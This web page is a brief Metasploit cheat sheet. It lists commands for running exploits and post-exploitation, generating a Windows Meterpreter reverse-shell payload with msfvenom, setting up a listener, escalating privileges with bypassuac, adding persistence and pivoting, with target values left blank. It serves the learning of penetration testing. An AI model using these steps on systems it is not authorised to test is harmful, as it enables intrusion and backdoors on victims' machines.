GO BACK TO HOME

Metasploit Detailed Guide

1. Installation

Ubuntu/Debian:

sudo apt update

sudo apt install metasploit-framework

CentOS/RHEL:

sudo yum install metasploit-framework

2. Basic Usage

Launch Metasploit Console:

msfconsole

Search for Modules:

search 

Use a Module:

use 

3. Exploiting Vulnerabilities

Set Target:

set RHOST 

Set Payload:

set PAYLOAD 

Run Exploit:

exploit

4. Post-Exploitation

Get System Info:

sysinfo

List Processes:

ps

Execute Commands:

execute -f 

5. Using Auxiliary Modules

Search Auxiliary Modules:

search type:auxiliary

Use an Auxiliary Module:

use auxiliary/

Run Auxiliary Module:

run

6. Meterpreter

Generate Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe

Set Up Listener:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 

set LPORT 

exploit

7. Advanced Techniques

Pivoting:

route add   

Privilege Escalation:

use exploit/windows/local/bypassuac

set SESSION 

exploit

Persistence:

run persistence -U -i 5 -p 4444 -r 

8. Scripting and Automation

Resource Scripts:

resource <script-file>

Metasploit API:

Use the Metasploit API for automation and integration

9. Troubleshooting

Check Metasploit Version:

msfconsole --version

Debugging Output:

msfconsole -d

Verbose Output:

msfconsole -v

10. Community and Resources

Official Metasploit Documentation:
Metasploit Documentation

Metasploit Mailing List:
Metasploit Mailing List

Metasploit User Guide:
Metasploit User Guide